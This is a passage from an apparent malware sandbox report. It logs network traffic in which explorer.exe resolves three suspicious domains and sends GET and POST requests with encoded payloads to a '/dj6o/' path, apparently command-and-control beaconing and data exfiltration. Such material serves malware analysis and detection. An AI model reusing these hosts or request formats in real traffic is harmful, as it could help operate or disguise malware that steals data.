Oct 16, 2022 05:30:43.217084885 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:53.479886055 CEST	49700	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:53.498955965 CEST	80	49700	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:53.499079943 CEST	49700	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:53.499188900 CEST	49700	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:53.518069983 CEST	80	49700	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:53.791114092 CEST	80	49700	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:53.791172028 CEST	80	49700	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:53.791330099 CEST	49700	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:54.508069992 CEST	49700	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:55.523991108 CEST	49701	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:55.541182041 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.541289091 CEST	49701	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:55.541697025 CEST	49701	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:55.558670998 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.558720112 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.558753014 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.560625076 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.560718060 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.842765093 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.842798948 CEST	80	49701	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:55.842895031 CEST	49701	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:56.554666042 CEST	49701	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.571427107 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.590434074 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.590590000 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.590800047 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.609571934 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.900973082 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.901040077 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.901082993 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.901138067 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.901324034 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.903775930 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.915240049 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.915291071 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.915313005 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:30:57.915642977 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.915980101 CEST	49702	80	192.168.2.3	35.241.57.73
Oct 16, 2022 05:30:57.934824944 CEST	80	49702	35.241.57.73	192.168.2.3
Oct 16, 2022 05:31:03.052078009 CEST	49703	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:03.109584093 CEST	80	49703	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:03.111191988 CEST	49703	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:03.111426115 CEST	49703	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:03.168993950 CEST	80	49703	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:03.169050932 CEST	80	49703	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:03.169081926 CEST	80	49703	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:03.169239044 CEST	49703	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:04.117711067 CEST	49703	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:05.133589029 CEST	49704	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:05.192428112 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.192615986 CEST	49704	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:05.192785978 CEST	49704	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:05.251116991 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.251173019 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.251205921 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.251236916 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.251264095 CEST	80	49704	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:05.251332045 CEST	49704	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:06.196018934 CEST	49704	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.211939096 CEST	49705	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.269459009 CEST	80	49705	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:07.269716978 CEST	49705	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.270884991 CEST	49705	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.328330994 CEST	80	49705	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:07.328385115 CEST	80	49705	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:07.328421116 CEST	80	49705	194.58.112.174	192.168.2.3
Oct 16, 2022 05:31:07.328588963 CEST	49705	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.328735113 CEST	49705	80	192.168.2.3	194.58.112.174
Oct 16, 2022 05:31:07.385730982 CEST	80	49705	194.58.112.174	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2022 05:30:43.076689005 CEST	49977	53	192.168.2.3	8.8.8.8
Oct 16, 2022 05:30:43.105238914 CEST	53	49977	8.8.8.8	192.168.2.3
Oct 16, 2022 05:30:53.230043888 CEST	57840	53	192.168.2.3	8.8.8.8
Oct 16, 2022 05:30:53.478898048 CEST	53	57840	8.8.8.8	192.168.2.3
Oct 16, 2022 05:31:02.953578949 CEST	57990	53	192.168.2.3	8.8.8.8
Oct 16, 2022 05:31:03.047243118 CEST	53	57990	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 16, 2022 05:30:43.076689005 CEST	192.168.2.3	8.8.8.8	0x8d6a	Standard query (0)	www.bunniesfor-sales.site	A (IP address)	IN (0x0001)	false
Oct 16, 2022 05:30:53.230043888 CEST	192.168.2.3	8.8.8.8	0xfa12	Standard query (0)	www.53kzl.xyz	A (IP address)	IN (0x0001)	false
Oct 16, 2022 05:31:02.953578949 CEST	192.168.2.3	8.8.8.8	0x42ad	Standard query (0)	www.soft-r.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 16, 2022 05:30:43.105238914 CEST	8.8.8.8	192.168.2.3	0x8d6a	No error (0)	www.bunniesfor-sales.site	bunniesfor-sales.site		CNAME (Canonical name)	IN (0x0001)	false
Oct 16, 2022 05:30:43.105238914 CEST	8.8.8.8	192.168.2.3	0x8d6a	No error (0)	bunniesfor-sales.site		64.190.62.22	A (IP address)	IN (0x0001)	false
Oct 16, 2022 05:30:53.478898048 CEST	8.8.8.8	192.168.2.3	0xfa12	No error (0)	www.53kzl.xyz		35.241.57.73	A (IP address)	IN (0x0001)	false
Oct 16, 2022 05:31:03.047243118 CEST	8.8.8.8	192.168.2.3	0x42ad	No error (0)	www.soft-r.pro		194.58.112.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bunniesfor-sales.site

www.53kzl.xyz

www.soft-r.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49699	64.190.62.22	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:30:43.133881092 CEST	103	OUT	GET /dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=NMTOyXsc8ePY2MKPEps/R25z0YSV56yvdacE+LTNH3L/G6DIQ9NvLR18puwfz5ktIQRwsxKrERsH/7mcoV+cyDukUw1T3fVygQ== HTTP/1.1 Host: www.bunniesfor-sales.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 16, 2022 05:30:43.177969933 CEST	105	IN	HTTP/1.1 200 OK date: Sun, 16 Oct 2022 03:30:43 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.9 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_adwpoRGatGO/KKsGkjiOlFxp09oFFBLf6GD9r4hGXUl8P6PrSHFsIPj8rwFHrfWZmLJXfOZbo6nPIaBSndmyDA== last-modified: Sun, 16 Oct 2022 03:30:43 GMT x-cache-miss-from: parking-66b8cd64f-4jw9t server: NginX connection: close Data Raw: 32 44 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 61 64 77 70 6f 52 47 61 74 47 4f 2f 4b 4b 73 47 6b 6a 69 4f 6c 46 78 70 30 39 6f 46 46 42 4c 66 36 47 44 39 72 34 68 47 58 55 6c 38 50 36 50 72 53 48 46 73 49 50 6a 38 72 77 46 48 72 66 57 5a 6d 4c 4a 58 66 4f 5a 62 6f 36 6e 50 49 61 42 53 6e 64 6d 79 44 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 75 6e 6e 69 65 73 66 6f 72 2d 73 61 6c 65 73 2e 73 69 74 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 62 75 6e 6e 69 65 73 66 6f 72 20 73 61 6c 65 73 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 75 6e 6e 69 65 73 66 6f 72 2d 73 61 6c 65 73 2e 73 69 74 65 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d Data Ascii: 2D0<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_adwpoRGatGO/KKsGkjiOlFxp09oFFBLf6GD9r4hGXUl8P6PrSHFsIPj8rwFHrfWZmLJXfOZbo6nPIaBSndmyDA==><head><meta charset="utf-8"><title>bunniesfor-sales.site - Informationen zum Thema bunniesfor sales.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="bunniesfor-sales.site ist die beste Quelle fr alle Informationen die Sie suchen. Von allgem
Oct 16, 2022 05:30:43.178037882 CEST	106	IN	Data Raw: 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 62 75 6e 6e 69 65 73 66 6f 72 2d 73 61 6c 65 73 2e Data Ascii: einen Themen bis hin zu speziellen Sachverhalten, finden Sie auf bunniesfor-sales.site alles. Wir hoffen, 1062dass Sie hier das Gesuchte finden!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templat
Oct 16, 2022 05:30:43.178083897 CEST	107	IN	Data Raw: 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 Data Ascii: flow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appe
Oct 16, 2022 05:30:43.178128004 CEST	108	IN	Data Raw: 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 Data Ascii: ment{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:
Oct 16, 2022 05:30:43.178169966 CEST	110	IN	Data Raw: 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e Data Ascii: t__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494
Oct 16, 2022 05:30:43.178210974 CEST	111	IN	Data Raw: 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 Data Ascii: ;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collaps
Oct 16, 2022 05:30:43.178252935 CEST	112	IN	Data Raw: 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 30 3b 68 Data Ascii: order-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;back
Oct 16, 2022 05:30:43.178293943 CEST	114	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 37 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 77 69 64 74 68 3a 33 30 30 70 78 Data Ascii: container-content__container-relatedlinks{margin-top:147px;flex-grow:1;width:300px}.container-content__container-ads{margin-top:8.5%}.container-content__container-ads--twot{margin-top:2.5%;height:700px}.container-content__webarchive{margin-top
Oct 16, 2022 05:30:43.178334951 CEST	115	IN	Data Raw: 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 Data Ascii: ent__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/te
Oct 16, 2022 05:30:43.178374052 CEST	115	IN	Data Raw: 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e Data Ascii: ock__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarc
Oct 16, 2022 05:30:43.197158098 CEST	117	IN	Data Raw: 35 37 36 0d 0a 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 Data Ascii: 576hive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"bunniesfor-sal

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49700	35.241.57.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:30:53.499188900 CEST	128	OUT	POST /dj6o/ HTTP/1.1 Host: www.53kzl.xyz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.53kzl.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.53kzl.xyz/dj6o/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 74 56 77 3d 73 32 51 45 5a 43 70 76 28 43 4c 59 57 6a 34 52 71 74 33 64 4c 7a 61 6e 48 6d 65 4a 54 4f 6b 73 45 61 43 33 52 5a 49 69 4d 6b 50 4c 45 67 4c 78 4b 55 4c 49 4c 61 77 34 47 6c 52 70 78 64 70 75 37 5a 6f 6b 64 6b 49 6d 4a 48 33 63 31 74 51 4e 6c 4a 78 4c 73 35 50 38 33 2d 4c 77 4e 4e 4d 70 56 4d 72 63 35 7a 43 63 66 41 4f 30 4c 77 32 59 4d 57 37 73 64 31 4b 56 4d 44 55 54 64 72 63 6b 48 5a 41 6a 49 44 65 33 6e 53 33 63 4d 4f 49 2d 54 54 7a 37 61 63 79 67 44 49 53 37 28 30 4f 42 66 70 4e 6b 30 77 49 50 56 38 50 39 56 33 45 57 38 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVw=s2QEZCpv(CLYWj4Rqt3dLzanHmeJTOksEaC3RZIiMkPLEgLxKULILaw4GlRpxdpu7ZokdkImJH3c1tQNlJxLs5P83-LwNNMpVMrc5zCcfAO0Lw2YMW7sd1KVMDUTdrckHZAjIDe3nS3cMOI-TTz7acygDIS7(0OBfpNk0wIPV8P9V3EW8w).
Oct 16, 2022 05:30:53.791114092 CEST	128	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Sun, 16 Oct 2022 03:30:53 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49701	35.241.57.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2022 05:30:55.541697025 CEST	134	OUT	POST /dj6o/ HTTP/1.1 Host: www.53kzl.xyz Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.53kzl.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.53kzl.xyz/dj6o/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 74 56 77 3d 73 32 51 45 5a 43 70 76 28 43 4c 59 57 43 6f 52 36 2d 66 64 65 44 61 67 62 57 65 4a 63 75 6b 67 45 61 7e 33 52 62 6b 79 4d 78 66 4c 45 33 6e 78 4b 33 7a 49 59 71 77 34 41 6c 52 54 28 39 6f 74 37 5a 74 56 64 6d 67 59 4a 46 37 63 30 2d 6f 4e 68 70 78 49 78 4a 50 39 30 2d 4c 78 4a 4e 4d 70 56 4d 75 5f 35 79 43 6d 66 42 32 30 4b 44 7e 59 4d 54 58 72 50 31 4b 49 4f 44 55 54 64 72 51 33 48 5a 41 5a 49 44 47 65 6e 54 58 63 4f 62 4d 2d 66 6d 50 34 63 4d 7a 6f 63 34 54 61 28 52 28 72 57 37 39 36 78 41 41 43 51 49 6d 4b 62 30 46 76 67 74 79 4f 42 45 39 6e 44 43 77 6f 7a 45 64 6a 58 6b 4b 79 78 36 7a 6c 6b 6f 67 43 37 46 62 62 38 74 73 74 63 6b 6f 67 37 66 30 34 32 4a 45 51 5a 32 67 5f 72 4c 76 64 53 70 56 31 72 43 4c 38 44 61 54 37 57 62 57 6c 57 39 58 6c 62 34 4a 79 4b 6b 66 66 78 79 53 35 67 70 70 4c 6e 4d 4d 64 4f 30 70 61 7a 75 6a 32 37 78 35 76 58 73 54 66 7e 68 28 30 28 54 42 68 54 66 6d 51 54 54 69 47 4e 5f 37 43 67 61 56 61 5a 4d 69 46 44 4e 32 48 4f 62 34 4b 5a 69 5a 7a 71 43 34 79 73 76 54 58 34 74 59 68 28 6e 72 66 31 45 78 47 74 70 58 4a 54 4e 65 6f 37 77 4a 34 44 64 54 5f 71 39 4b 47 76 74 72 4d 61 66 41 63 33 55 5a 47 6b 6b 44 46 4d 64 37 6f 41 42 53 6f 4d 66 7e 53 48 77 28 6b 4f 33 58 4f 62 64 35 69 7e 33 6f 44 4e 52 59 55 32 30 6e 37 45 33 36 74 68 50 63 54 7a 76 63 36 68 4d 6f 79 57 37 4f 75 57 41 6c 38 6f 50 32 36 4b 52 6c 4c 4b 77 44 78 6d 49 42 70 61 49 57 53 42 55 45 42 76 6f 6f 4f 76 6c 46 59 72 77 4e 69 79 33 63 6b 54 46 5a 6a 53 35 34 6f 54 70 42 79 76 54 7e 6b 4e 4d 35 6e 6a 48 69 6d 45 44 53 4f 4e 35 31 32 64 35 55 44 68 46 52 4b 6b 78 43 4d 45 46 6c 61 42 77 48 39 50 6e 56 43 62 64 70 50 67 6b 79 58 64 6c 72 42 4d 6f 56 61 43 45 30 5a 4a 48 34 44 51 4e 68 33 69 45 6e 71 63 63 28 56 4b 6c 34 66 78 68 79 57 4d 44 58 31 57 59 36 30 32 6c 6b 36 6f 74 73 53 51 5a 70 41 35 35 63 42 42 79 77 45 4c 4d 58 35 69 73 47 42 39 4a 54 2d 69 39 73 73 6e 4b 57 4f 37 78 57 48 38 39 39 71 63 30 38 37 62 66 65 38 7a 67 6a 52 70 78 53 6e 6a 55 79 2d 65 42 34 7a 47 6f 33 37 42 2d 66 5f 59 7a 66 36 6d 69 57 59 4e 4a 44 42 61 50 48 39 69 4a 66 4a 39 35 31 52 45 76 36 4e 64 55 35 43 66 7a 56 67 48 43 52 73 70 74 45 39 45 31 41 65 67 72 77 50 30 48 7e 2d 66 4e 6c 45 30 6b 6e 37 74 75 79 2d 35 56 37 5a 68 56 31 35 4e 67 61 50 33 39 45 69 38 41 44 31 55 38 28 44 58 4b 63 6b 75 5a 35 6f 44 51 61 59 57 4e 79 4f 6e 7a 70 5a 41 6c 57 72 6e 2d 36 47 73 78 61 4a 78 37 59 57 47 64 30 77 37 7a 6c 77 37 35 67 65 4c 78 76 37 6d 4d 28 39 6b 72 79 77 74 51 78 51 66 73 79 71 6b 47 72 50 4c 39 6a 5a 47 41 6a 4b 64 73 5a 33 68 77 64 66 54 56 63 74 4e 6c 49 63 76 54 50 73 6f 2d 46 4a 6e 45 6c 47 77 6e 67 63 72 49 68 4c 42 4f 44 77 59 75 6a 73 57 71 4d 67 42 7a 46 32 56 4b 45 39 36 6e 45 4e 4f 70 49 5f 63 77 63 77 57 71 42 55 34 31 45 42 47 75 6e 55 6d 6e 38 7a 52 61 6f 67 6e 63 34 30 78 6a 6b 5f 74 4e 75 70 31 37 72 55 6e 51 71 59 6d 4e 28 46 63 4e 44 4a 31 70 43 72 5a 72 47 4c 4b 31 7e 33 65 64 5a 49 4f 6a 72 59 59 41 78 50 44 67 62 45 37 38 6b 41 4a 4f 55 31 7e 35 68 63 62 6f 4c 39 79 78 36 38 59 56 34 57 74 37 31 55 4a 4c 57 57 62 4e 50 39 44 39 64 6b 31 4b 52 47 69 79 54 69 28 54 6e 67 39 4f 79 31 37 49 66 61 55 51 52 56 69 68 4c 49 57 55 7e 4a 4e 34 66 46 43 54 73 39 62 77 69 36 66 55 63 57 6a 35 54 61 50 67 70 2d 78 65 6b 6d 71 71 38 67 43 64 78 71 42 45 4d 38 53 58 6a 51 66 65 78 33 39 68 35 54 69 37 32 79 55 32 47 66 39 59 42 4f 39 67 76 67 35 6e 4d 6b 7e 4f 63 73 34 37 46 64 50 7a 44 56 72 51 38 5f 64 4b 7e 5f 38 4b 46 4e 4e 70 5a 58 64 79 73 78 62 62 37 5f 32 75 78 75 38 75 48 33 33 77 37 69 6f 39 73 73 36 6b 38 46 71 39 78 70 47 52 61 4b 45 48 77 61 61 63 79 6f 73 63 46 6c 71 2d 49 5f 7e 4a 70 47 57 77 53 78 45 78 4f 6f 70 33 35 6a 37 46 57 32 31 58 68 30 35 36 4b 35 28 5f 48 6e 62 31 35 42 4c 31 54 43 4f 53 7e 35 56 5a 5a 41 72 72 6f 34 69 68 69 76 65 57 34 6e 49 51 4d 74 71 64 41 6d 35 49 6a 54 4e 2d 72 54 30 73 45 62 67 65 61 42 35 70 77 4e 6e 57 34 68 4e 55 30 43 51 57 47 46 39 78 41 62 48 6b 